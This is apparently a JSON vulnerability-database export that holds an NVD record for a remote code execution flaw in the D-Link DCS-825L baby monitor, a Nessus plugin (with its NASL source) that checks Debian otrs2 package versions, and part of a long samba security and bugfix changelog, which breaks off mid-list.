"2021-02-02T06:36:33", "description": "D-Link EyeOn Baby Monitor (DCS-825L) 1.08.1 has a remote code execution vulnerability. A UDP \"Discover\" service, which provides multiple functions such as changing the passwords and getting basic information, was installed on the device. A remote attacker can send a crafted UDP request to finderd to perform stack overflow and execute arbitrary code with root privilege on the device.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-24T19:29:00", "title": "CVE-2017-11563", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11563"], "modified": "2018-11-02T13:08:00", "cpe": ["cpe:/o:dlink:eyeon_baby_monitor_firmware:1.08.1"], "id": "CVE-2017-11563", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11563", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:dlink:eyeon_baby_monitor_firmware:1.08.1:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-12T09:41:12", "description": "Several security issues have been fixed in otrs2, a well known trouble\nticket system.\n\nCVE-2018-11563\n\nAn attacker who is logged into OTRS as a customer can use the ticket\noverview screen to disclose internal article information of their\ncustomer tickets.\n\nCVE-2019-12746\n\nA user logged into OTRS as an agent might unknowingly disclose their\nsession ID by sharing the link of an embedded ticket article with\nthird parties. This identifier can be then potentially abused in order\nto impersonate the agent user.\n\nCVE-2019-13458\n\nAn attacker who is logged into OTRS as an agent user with appropriate\npermissions can leverage OTRS tags in templates in order to disclose\nhashed user passwords.\n\nDue to an incomplete fix for CVE-2019-12248, viewing email attachments\nwas no longer possible. This update correctly implements the new\nTicket::Fronted::BlockLoadingRemoteContent option.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n3.3.18-1+deb8u11.\n\nWe recommend that you upgrade your otrs2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 16, "cvss3": {"score": 4.6, "vector": "AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N"}, "published": "2019-08-20T00:00:00", "title": "Debian DLA-1877-1 : otrs2 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13458", "CVE-2019-12248", "CVE-2018-11563", "CVE-2019-12746"], "modified": "2019-08-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:otrs2", "cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:otrs"], "id": "DEBIAN_DLA-1877.NASL", "href": "https://www.tenable.com/plugins/nessus/127920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1877-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127920);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-11563\", \"CVE-2019-12746\", \"CVE-2019-13458\");\n\n script_name(english:\"Debian DLA-1877-1 : otrs2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues have been fixed in otrs2, a well known trouble\nticket system.\n\nCVE-2018-11563\n\nAn attacker who is logged into OTRS as a customer can use the ticket\noverview screen to disclose internal article information of their\ncustomer tickets.\n\nCVE-2019-12746\n\nA user logged into OTRS as an agent might unknowingly disclose their\nsession ID by sharing the link of an embedded ticket article with\nthird parties. This identifier can be then potentially abused in order\nto impersonate the agent user.\n\nCVE-2019-13458\n\nAn attacker who is logged into OTRS as an agent user with appropriate\npermissions can leverage OTRS tags in templates in order to disclose\nhashed user passwords.\n\nDue to an incomplete fix for CVE-2019-12248, viewing email attachments\nwas no longer possible. This update correctly implements the new\nTicket::Fronted::BlockLoadingRemoteContent option.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n3.3.18-1+deb8u11.\n\nWe recommend that you upgrade your otrs2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/08/msg00018.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/otrs2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected otrs, and otrs2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11563\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:otrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:otrs2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"otrs\", reference:\"3.3.18-1+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"otrs2\", reference:\"3.3.18-1+deb8u11\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.9, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-20T12:30:19", "description": "samba was updated to version 4.2.4 to fix 14 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-5370: DCERPC server and client were vulnerable\n to DOS and MITM attacks (bsc#936862).\n\n - CVE-2016-2110: A man-in-the-middle could have downgraded\n NTLMSSP authentication (bsc#973031).\n\n - CVE-2016-2111: Domain controller netlogon member\n computer could have been spoofed (bsc#973032).\n\n - CVE-2016-2112: LDAP conenctions were vulnerable to\n downgrade and MITM attack (bsc#973033).\n\n - CVE-2016-2113: TLS certificate validation were missing\n (bsc#973034).\n\n - CVE-2016-2115: Named pipe IPC were vulnerable to MITM\n attacks (bsc#973036).\n\n - CVE-2016-2118: 'Badlock' DCERPC impersonation of\n authenticated account were possible (bsc#971965).\n\n - CVE-2015-3223: Malicious request can cause Samba LDAP\n server to hang, spinning using CPU (boo#958581).\n\n - CVE-2015-5330: Remote read memory exploit in LDB\n (boo#958586).\n\n - CVE-2015-5252: Insufficient symlink verification (file\n access outside the share)(boo#958582).\n\n - CVE-2015-5296: No man in the middle protection when\n forcing smb encryption on the client side (boo#958584).\n\n - CVE-2015-5299: Currently the snapshot browsing is not\n secure thru windows previous version (shadow_copy2)\n (boo#958583).\n\n - CVE-2015-8467: Fix Microsoft MS15-096 to prevent machine\n accounts from being changed into user accounts\n (boo#958585).\n\n - CVE-2015-7560: Getting and setting Windows ACLs on\n symlinks can change permissions on link target\n (boo#968222).\n\nThese non-security issues were fixed :\n\n - Fix samba.tests.messaging test and prevent potential tdb\n corruption by removing obsolete now invalid tdb_close\n call; (boo#974629).\n\n - Align fsrvp feature sources with upstream version.\n\n - Obsolete libsmbsharemodes0 from samba-libs and\n libsmbsharemodes-devel from samba-core-devel;\n (boo#973832).\n\n - s3:utils/smbget: Fix recursive download; (bso#6482).\n\n - s3: smbd: posix_acls: Fix check for setting u:g:o entry\n on a filesystem with no ACL support; (bso#10489).\n\n - docs: Add example for domain logins to smbspool man\n page; (bso#11643).\n\n - s3-client: Add a KRB5 wrapper for smbspool; (bso#11690).\n\n - loadparm: Fix memory leak issue; (bso#11708).\n\n - lib/tsocket: Work around sockets not supporting\n FIONREAD; (bso#11714).\n\n - ctdb-scripts: Drop use of 'smbcontrol winbindd\n ip-dropped ...'; (bso#11719).\n\n - s3:smbd:open: Skip redundant call to file_set_dosmode\n when creating a new file; (bso#11727).\n\n - param: Fix str_list_v3 to accept ';' again; (bso#11732).\n\n - Real memeory leak(buildup) issue in loadparm;\n (bso#11740).\n\n - Obsolete libsmbclient from libsmbclient0 and\n libpdb-devel from libsamba-passdb-devel while not\n providing it; (boo#972197).\n\n - Upgrade on-disk FSRVP server state to new version;\n (boo#924519).\n\n - Only obsolete but do not provide gplv2/3 package names;\n (boo#968973).\n\n - Enable clustering (CTDB) support; (boo#966271).\n\n - s3: smbd: Fix timestamp rounding inside SMB2 create;\n (bso#11703); (boo#964023).\n\n - vfs_fruit: Fix renaming directories with open files;\n (bso#11065).\n\n - Fix MacOS finder error 36 when copying folder to Samba;\n (bso#11347).\n\n - s3:smbd/oplock: Obey kernel oplock setting when\n releasing oplocks; (bso#11400).\n\n - Fix copying files with vfs_fruit when using\n vfs_streams_xattr without stream prefix and type suffix;\n (bso#11466).\n\n - s3:libsmb: Correctly initialize the list head when\n keeping a list of primary followed by DFS connections;\n (bso#11624).\n\n - Reduce the memory footprint of empty string options;\n (bso#11625).\n\n - lib/async_req: Do not install async_connect_send_test;\n (bso#11639).\n\n - docs: Fix typos in man vfs_gpfs; (bso#11641).\n\n - smbd: make 'hide dot files' option work with 'store dos\n attributes = yes'; (bso#11645).\n\n - smbcacls: Fix uninitialized variable; (bso#11682).\n\n - s3:smbd: Ignore initial allocation size for directory\n creation; (bso#11684).\n\n - Changing log level of two entries to from 1 to 3;\n (bso#9912).\n\n - vfs_gpfs: Re-enable share modes; (bso#11243).\n\n - wafsamba: Also build libraries with RELRO protection;\n (bso#11346).\n\n - ctdb: Strip trailing spaces from nodes file;\n (bso#11365).\n\n - s3-smbd: Fix old DOS client doing wildcard delete -\n gives a attribute type of zero; (bso#11452).\n\n - nss_wins: Do not run into use after free issues when we\n access memory allocated on the globals and the global\n being reinitialized; (bso#11563).\n\n - async_req: Fix non-blocking connect(); (bso#11564).\n\n - auth: gensec: Fix a memory leak; (bso#11565).\n\n - lib: util: Make non-critical message a warning;\n (bso#11566).\n\n - Fix winbindd crashes with samlogon for trusted domain\n user; (bso#11569); (boo#949022).\n\n - smbd: Send SMB2 oplock breaks unencrypted; (bso#11570).\n\n - ctdb: Open the RO tracking db with perms 0600 instead of\n 0000; (bso#11577).\n\n - manpage: Correct small typo error; (bso#11584).\n\n - s3: smbd: If EA's are turned off on a share don't allow\n an SMB2 create containing them; (bso#11589).\n\n - Backport some valgrind fixes from upstream master;\n (bso#11597).\n\n - s3: smbd: have_file_open_below() fails to enumerate open\n files below an open directory handle; (bso#11615).\n\n - docs: Fix some typos in the idmap config section of man\n 5 smb.conf; (bso#11619).\n\n - Remove redundant configure options while adding\n with-relro.\n\n - s3: smbd: Fix our access-based enumeration on 'hide\n unreadable' to match Windows; (bso#10252).\n\n - smbd: Fix file name buflen and padding in notify\n repsonse; (bso#10634).\n\n - kerberos: Make sure we only use prompter type when\n available; (bso#11038).\n\n - s3:ctdbd_conn: Make sure we destroy tevent_fd before\n closing the socket; (bso#11316).\n\n - dcerpc.idl: accept invalid dcerpc_bind_nak pdus;\n (bso#11327).\n\n - Fix a deadlock in tdb; (bso#11381).\n\n - s3: smbd: Fix mkdir race condition; (bso#11486).\n\n - pam_winbind: Fix a segfault if initialization fails;\n (bso#11502).\n\n - s3: dfs: Fix a crash when the dfs targets are disabled;\n (bso#11509).\n\n - s3: smbd: Fix opening/creating :stream files on the root\n share directory; (bso#11522).\n\n - net: Fix a crash with 'net ads keytab create';\n (bso#11528).\n\n - s3: smbd: Fix a crash in unix_convert() and a NULL\n pointer bug introduced by previous 'raw' stream fix\n (bso#11522); (bso#11535).\n\n - vfs_fruit: Return value of ad_pack in vfs_fruit.c;\n (bso#11543).\n\n - vfs_commit: Set the fd on open before calling\n SMB_VFS_FSTAT; (bso#11547).\n\n - Fix bug in smbstatus where the lease info is not\n printed; (bso#11549).\n\n - s3:smbstatus: Add stream name to share_entry_forall();\n (bso#11550).\n\n - Relocate the tmpfiles.d directory to the client package;\n (boo#947552).\n\n - Do not provide libpdb0 from libsamba-passdb0 but add it\n to baselibs.conf instead; (boo#942716).\n\n - Package /var/lib/samba/private/sock with 0700\n permissions; (boo#946051).\n\n - auth/credentials: If credentials have principal set,\n they are not anonymous anymore; (bso#11265).\n\n - Fix stream names with colon with 'fruit:encoding =\n native'; (bso#11278).\n\n - s4:rpc_server/netlogon: Fix for NetApp; (bso#11291).\n\n - lib: Fix rundown of open_socket_out(); (bso#11316).\n\n - s3:lib: Fix some corner cases of\n open_socket_out_cleanup(); (bso#11316).\n\n - vfs:fruit: Implement copyfile style copy_chunk;\n (bso#11317).\n\n - ctdb-daemon: Return correct sequence number for\n CONTROL_GET_DB_SEQNUM; (bso#11398).\n\n - ctdb-scripts: Support monitoring of interestingly named\n VLANs on bonds; (bso#11399).\n\n - ctdb-daemon: Improve error handling for running event\n scripts; (bso#11431).\n\n - ctdb-daemon: Check if updates are in flight when\n releasing all IPs; (bso#11432).\n\n - ctdb-build: Fix building of PCP PMDA module;\n (bso#11435).\n\n - Backport dcesrv_netr_DsRGetDCNameEx2 fixes; (bso#11454).\n\n - vfs_fruit: Handling of empty resource fork; (bso#11467).\n\n - Avoid quoting problems in user's DNs; (bso#11488).\n\n - s3-auth: Fix 'map to guest = Bad uid'; (bso#9862).\n\n - s4:lib/tls: Fix build with gnutls 3.4; (bso#8780).\n\n - s4.2/fsmo.py: Fixed fsmo transfer exception;\n (bso#10924).\n\n - winbindd: Sync secrets.ldb into secrets.tdb on startup;\n (bso#10991).\n\n - Logon via MS Remote Desktop hangs; (bso#11061).\n\n - s3: lib: util: Ensure we read a hex number as %x, not\n %u; (bso#11068).\n\n - tevent: Add a note to tevent_add_fd(); (bso#11141).\n\n - s3:param/loadparm: Fix 'testparm --show-all-parameters';\n (bso#11170).\n\n - s3-unix_msg: Remove socket file after closing socket fd;\n (bso#11217).\n\n - smbd: Fix a use-after-free; (bso#11218); (boo#919309).\n\n - s3-rpc_server: Fix rpc_create_tcpip_sockets() processing\n of interfaces; (bso#11245).\n\n - s3:smb2: Add padding to last command in compound\n requests; (bso#11277).\n\n - Add IPv6 support to ADS client side LDAP connects;\n (bso#11281).\n\n - Add IPv6 support for determining FQDN during ADS join;\n (bso#11282).\n\n - s3: IPv6 enabled DNS connections for ADS client;\n (bso#11283).\n\n - Fix invalid write in ctdb_lock_context_destructor;\n (bso#11293).\n\n - Excessive cli_resolve_path() usage can slow down\n transmission; (bso#11295).\n\n - vfs_fruit: Add option 'veto_appledouble'; (bso#11305).\n\n - tstream: Make socketpair nonblocking; (bso#11312).\n\n - idmap_rfc2307: Fix wbinfo '--gid-to-sid' query;\n (bso#11313).\n\n - Group creation: Add msSFU30Name only when --nis-domain\n was given; (bso#11315).\n\n - tevent_fd needs to be destroyed before closing the fd;\n (bso#11316).\n\n - Build fails on Solaris 11 with\n '&lsquo;PTHREAD_MUTEX_ROBUST&rsquo; undeclared';\n (bso#11319).\n\n - smbd/trans2: Add a useful diagnostic for files with bad\n encoding; (bso#11323).\n\n - Change sharesec output back to previous format;\n (bso#11324).\n\n - Robust mutex support broken in 1.3.5; (bso#11326).\n\n - Kerberos auth info3 should contain resource group ids\n available from pac_logon; winbindd:\n winbindd_raw_kerberos_login - ensure logon_info exists\n in PAC; (bso#11328); (boo#912457).\n\n - s3:smb2_setinfo: Fix memory leak in the defer_rename\n case; (bso#11329).\n\n - tevent: Fix CID 1035381 Unchecked return value;\n (bso#11330).\n\n - tdb: Fix CID 1034842 and 1034841 Resource leaks;\n (bso#11331).\n\n - s3: smbd: Use separate flag to track\n become_root()/unbecome_root() state; (bso#11339).\n\n - s3: smbd: Codenomicon crash in do_smb_load_module();\n (bso#11342).\n\n - pidl: Make the compilation of PIDL producing the same\n results if the content hasn't change; (bso#11356).\n\n - winbindd: Disconnect child process if request is\n cancelled at main process; (bso#11358).\n\n - vfs_fruit: Check offset and length for AFP_AfpInfo read\n requests; (bso#11363).\n\n - docs: Overhaul the description of 'smb encrypt' to\n include SMB3 encryption; (bso#11366).\n\n - s3:auth_domain: Fix talloc problem in\n connect_to_domain_password_server(); (bso#11367).\n\n - ncacn_http: Fix GNUism; (bso#11371).\n\n - Backport changes to use resource group sids obtained\n from pac logon_info; (bso#11328); (boo#912457).\n\n - Order winbind.service Before and Want nss-user-lookup\n target.\n\n - s3:smbXsrv: refactor duplicate code into\n smbXsrv_session_clear_and_logoff(); (bso#11182).\n\n - gencache: don't fail gencache_stabilize if there were\n records to delete; (bso#11260).\n\n - s3: libsmbclient: After getting attribute server, ensure\n main srv pointer is still valid; (bso#11186).\n\n - s4: rpc: Refactor dcesrv_alter() function into setup and\n send steps; (bso#11236).\n\n - s3: smbd: Incorrect file size returned in the response\n of 'FILE_SUPERSEDE Create'; (bso#11240).\n\n - Mangled names do not work with acl_xattr; (bso#11249).\n\n - nmbd rewrites browse.dat when not required; (bso#11254).\n\n - vfs_fruit: add option 'nfs_aces' that controls the NFS\n ACEs stuff; (bso#11213).\n\n - s3:smbd: Add missing tevent_req_nterror; (bso#11224).\n\n - vfs: kernel_flock and named streams; (bso#11243).\n\n - vfs_gpfs: Error code path doesn't call END_PROFILE;\n (bso#11244).\n\n - s4: libcli/finddcs_cldap: continue processing CLDAP\n until all addresses are used; (bso#11284).\n\n - ctdb: check for talloc_asprintf() failure; (bso#11201).\n\n - spoolss: purge the printer name cache on name change;\n (bso#11210); (boo#901813).\n\n - CTDB statd-callout does not scale; (bso#11204).\n\n - vfs_fruit: also map characters below 0x20; (bso#11221).\n\n - ctdb: Coverity fix for CID 1291643; (bso#11201).\n\n - Multiplexed RPC connections are not handled by DCERPC\n server; (bso#11225).\n\n - Fix terminate connection behavior for asynchronous\n endpoint with PUSH notification flavors; (bso#11226).\n\n - ctdb-scripts: Fix bashism in ctdbd_wrapper script;\n (bso#11007).\n\n - ctdb: Fix CIDs 1125615, 1125634, 1125613, 1288201 and\n 1125553; (bso#11201).\n\n - SMB2 should cancel pending NOTIFY calls with\n DELETE_PENDING if the directory is deleted; (bso#11257).\n\n - s3:winbindd: make sure we remove pending io requests\n before closing client\n\n - 'sharesec' output no longer matches input format;\n (bso#11237).\n\n - waf: Fix systemd detection; (bso#11200).\n\n - CTDB: Fix portability issues; (bso#11202).\n\n - CTDB: Fix some IPv6-related issues; (bso#11203).\n\n - CTDB statd-callout does not scale; (bso#11204).\n\n - 'net ads dns gethostbyname' crashes with an error in\n TALLOC_FREE if you enter invalid values; (bso#11234).\n\n - libads: record service ticket endtime for sealed ldap\n connections;\n\n - lib/util: Include DEBUG macro in internal header files\n before samba_util.h; (bso#11033).\n\n - Initialize dwFlags field of DNS_RPC_NODE structure;\n (bso#9791).\n\n - s3: lib: ntlmssp: If NTLMSSP_NEGOTIATE_TARGET_INFO isn't\n set, cope with servers that don't send the 2 unused\n fields; (bso#10016).\n\n - build:wafadmin: Fix use of spaces instead of tabs;\n (bso#10476).\n\n - waf: Fix the build on openbsd; (bso#10476).\n\n - s3: client: 'client use spnego principal = yes' code\n checks wrong name;\n\n - spoolss: Retrieve published printer GUID if not in\n registry; (bso#11018).\n\n - vfs_fruit: Enhance handling of malformed AppleDouble\n files; (bso#11125).\n\n - backupkey: Explicitly link to gnutls and gcrypt;\n (bso#11135).\n\n - replace: Remove superfluous check for gcrypt header;\n (bso#11135).\n\n - Backport subunit changes; (bso#11137).\n\n - libcli/auth: Match Declaration of\n netlogon_creds_cli_context_tmp with implementation;\n (bso#11140).\n\n - s3-winbind: Fix cached user group lookup of trusted\n domains; (bso#11143).\n\n - talloc: Version 2.1.2; (bso#11144).\n\n - Update libwbclient version to 0.12; (bso#11149).\n\n - brlock: Use 0 instead of empty initializer list;\n (bso#11153).\n\n - s4:auth/gensec_gssapi: Let gensec_gssapi_update() return\n\n - backupkey: Use ndr_pull_struct_blob_all(); (bso#11174).\n\n - Fix lots of winbindd zombie processes on Solaris\n platform; (bso#11175).\n\n - Prevent samba package updates from disabling samba\n kerberos printing.\n\n - Add sparse file support for samba; (fate#318424).\n\n - Simplify libxslt build requirement and README.SUSE\n install.\n\n - Remove no longer required cleanup steps while populating\n the build root.\n\n - smbd: Stop using vfs_Chdir after SMB_VFS_DISCONNECT;\n (bso#1115).\n\n - pam_winbind: fix warn_pwd_expire implementation;\n (bso#9056).\n\n - nsswitch: Fix soname of linux nss_*.so.2 modules;\n (bso#9299).\n\n - Make 'profiles' work again; (bso#9629).\n\n - s3:smb2_server: protect against integer wrap with 'smb2\n max credits = 65535'; (bso#9702).\n\n - Make validate_ldb of String(Generalized-Time) accept\n millisecond format '.000Z'; (bso#9810).\n\n - Use -R linker flag on Solaris, not -rpath; (bso#10112).\n\n - vfs: Add glusterfs manpage; (bso#10240).\n\n - Make 'smbclient' use cached creds; (bso#10279).\n\n - pdb: Fix build issues with shared modules; (bso#10355).\n\n - s4-dns: Add support for BIND 9.10; (bso#10620).\n\n - idmap: Return the correct id type to *id_to_sid methods;\n (bso#10720).\n\n - printing/cups: Pack requested-attributes with\n IPP_TAG_KEYWORD; (bso#10808).\n\n - Don't build vfs_snapper on FreeBSD; (bso#10834).\n\n - nss_winbind: Add getgroupmembership for FreeBSD;\n (bso#10835).\n\n - idmap_rfc2307: Fix a crash after connection problem to\n DC; (bso#10837).\n\n - s3: smb2cli: query info return length check was\n reversed; (bso#10848).\n\n - s3: lib, s3: modules: Fix compilation on Solaris;\n (bso#10849).\n\n - lib: uid_wrapper: Fix setgroups and syscall detection on\n a system without native uid_wrapper library;\n (bso#10851).\n\n - winbind3: Fix pwent variable substitution; (bso#10852).\n\n - Improve samba-regedit; (bso#10859).\n\n - registry: Don't leave dangling transactions;\n (bso#10860).\n\n - Fix build of socket_wrapper on systems without\n SO_PROTOCOL; (bso#10861).\n\n - build: Do not install 'texpect' binary anymore;\n (bso#10862).\n\n - Fix testparm to show hidden share defaults; (bso#10864).\n\n - libcli/smb: Fix smb2cli_validate_negotiate_info with\n min=PROTOCOL_NT1 max=PROTOCOL_SMB2_02; (bso#10866).\n\n - Integrate CTDB into top-level Samba build; (bso#10892).\n\n - samba-tool group add: Add option '--nis-domain' and\n '--gid'; (bso#10895).\n\n - s3-nmbd: Fix netbios name truncation; (bso#10896).\n\n - spoolss: Fix handling of bad EnumJobs levels;\n (bso#10898).\n\n - Fix smbclient loops doing a directory listing against\n Mac OS X 10 server with a non-wildcard path;\n (bso#10904).\n\n - Fix print job enumeration; (bso#10905); (boo#898031).\n\n - samba-tool: Create NIS enabled users and\n unixHomeDirectory attribute; (bso#10909).\n\n - Add support for SMB2 leases; (bso#10911).\n\n - btrfs: Don't leak opened directory handle; (bso#10918).\n\n - s3: nmbd: Ensure NetBIOS names are only 15 characters\n stored; (bso#10920).\n\n - s3:smbd: Fix file corruption using 'write cache size !=\n 0'; (bso#10921).\n\n - pdb_tdb: Fix a TALLOC/SAFE_FREE mixup; (bso#10932).\n\n - s3-keytab: fix keytab array NULL termination;\n (bso#10933).\n\n - s3:passdb: fix logic in pdb_set_pw_history();\n (bso#10940).\n\n - Cleanup add_string_to_array and usage; (bso#10942).\n\n - dbwrap_ctdb: Pass on mutex flags to tdb_open;\n (bso#10942).\n\n - Fix RootDSE search with extended dn control;\n (bso#10949).\n\n - Fix 'samba-tool dns serverinfo <server>' for IPv6;\n (bso#10952).\n\n - libcli/smb: only force signing of smb2 session setups\n when binding a new session; (bso#10958).\n\n - s3-smbclient: Return success if we listed the shares;\n (bso#10960).\n\n - s3-smbstatus: Fix exit code of profile output;\n (bso#10961).\n\n - socket_wrapper: Add missing prototype check for eventfd;\n (bso#10965).\n\n - libcli: SMB2: Pure SMB2-only negprot fix to make us\n behave as a Windows client does; (bso#10966).\n\n - vfs_streams_xattr: Check stream type; (bso#10971).\n\n - s3: smbd: Fix *allocate* calls to follow POSIX error\n return convention; (bso#10982).\n\n - vfs_fruit: Add support for AAPL; (bso#10983).\n\n - Fix spoolss IDL response marshalling when returning\n error without clearing info; (bso#10984).\n\n - dsdb-samldb: Check for extended access rights before we\n allow changes to userAccountControl; (bso#10993);\n CVE-2014-8143; (boo#914279).\n\n - Fix IPv6 support in CTDB; (bso#10996).\n\n - ctdb-daemon: Use correct tdb flags when enabling robust\n mutex support; (bso#11000).\n\n - vfs_streams_xattr: Add missing call to\n SMB_VFS_NEXT_CONNECT; (bso#11005).\n\n - s3-util: Fix authentication with long hostnames;\n (bso#11008).\n\n - ctdb-build: Fix build without xsltproc; (bso#11014).\n\n - packaging: Include CTDB man pages in the tarball;\n (bso#11014).\n\n - pdb_get_trusteddom_pw() fails with non valid UTF16\n random passwords; (bso#11016).\n\n - Make Sharepoint search show user documents; (bso#11022).\n\n - nss_wrapper: check for nss.h; (bso#11026).\n\n - Enable mutexes in gencache_notrans.tdb; (bso#11032).\n\n - tdb_wrap: Make mutexes easier to use; (bso#11032).\n\n - lib/util: Avoid collision which alread defined consumer\n DEBUG macro; (bso#11033).\n\n - winbind: Retry after SESSION_EXPIRED error in ping-dc;\n (bso#11034).\n\n - s3-libads: Fix a possible segfault in\n kerberos_fetch_pac(); (bso#11037).\n\n - vfs_fruit: Fix base_fsp name conversion; (bso#11039).\n\n - vfs_fruit: mmap under FreeBSD needs PROT_READ;\n (bso#11040).\n\n - Fix authentication using Kerberos (not AD); (bso#11044).\n\n - net: Fix sam addgroupmem; (bso#11051).\n\n - vfs_snapper: Correctly handles multi-byte DBus strings;\n (bso#11055); (boo#913238).\n\n - cli_connect_nb_send: Don't segfault on host == NULL;\n (bso#11058).\n\n - utils: Fix 'net time' segfault; (bso#11058).\n\n - libsmb: Provide authinfo domain for encrypted session\n referrals; (bso#11059).\n\n - s3-pam_smbpass: Fix memory leak in\n pam_sm_authenticate(); (bso#11066).\n\n - vfs_glusterfs: Add comments to the pipe(2) code;\n (bso#11069).\n\n - vfs/glusterfs: Change xattr key to match gluster key;\n (bso#11069).\n\n - vfs_glusterfs: Implement AIO support; (bso#11069).\n\n - s3-vfs: Fix developer build of vfs_ceph module;\n (bso#11070).\n\n - s3: netlogon: Ensure we don't call talloc_free on an\n uninitialized pointer; (bso#11077); CVE-2015-0240;\n (boo#917376).\n\n - vfs: Add a brief vfs_ceph manpage; (bso#11088).\n\n - s3: smbclient: Allinfo leaves the file handle open;\n (bso#11094).\n\n - Fix Win8.1 Credentials Manager issue after KB2992611 on\n Samba domain; (bso#11097).\n\n - debug: Set close-on-exec for the main log file FD;\n (bso#11100).\n\n - s3: smbd: leases - losen paranoia check. Stat opens can\n grant leases; (bso#11102).\n\n - s3: smbd: SMB2 close. If a file has delete on close,\n store the return info before deleting; (bso#11104).\n\n - doc:man:vfs_glusterfs: improve the configuration\n section; (bso#11117).\n\n - snprintf: Try to support %j; (bso#11119).\n\n - ctdb-io: Do not use sys_write to write to client\n sockets; (bso#11124).\n\n - doc-xml: Add 'sharesec' reference to 'access based share\n enum'; (bso#11127).\n\n - Fix usage of freed memory on server exit; (bso#11218);\n (boo#919309).\n\n - Adjust baselibs.conf due to libpdb0 package rename to\n libsamba-passdb0.\n\n - Add libsamba-debug, libsocket-blocking,\n libsamba-cluster-support, and libhttp to the 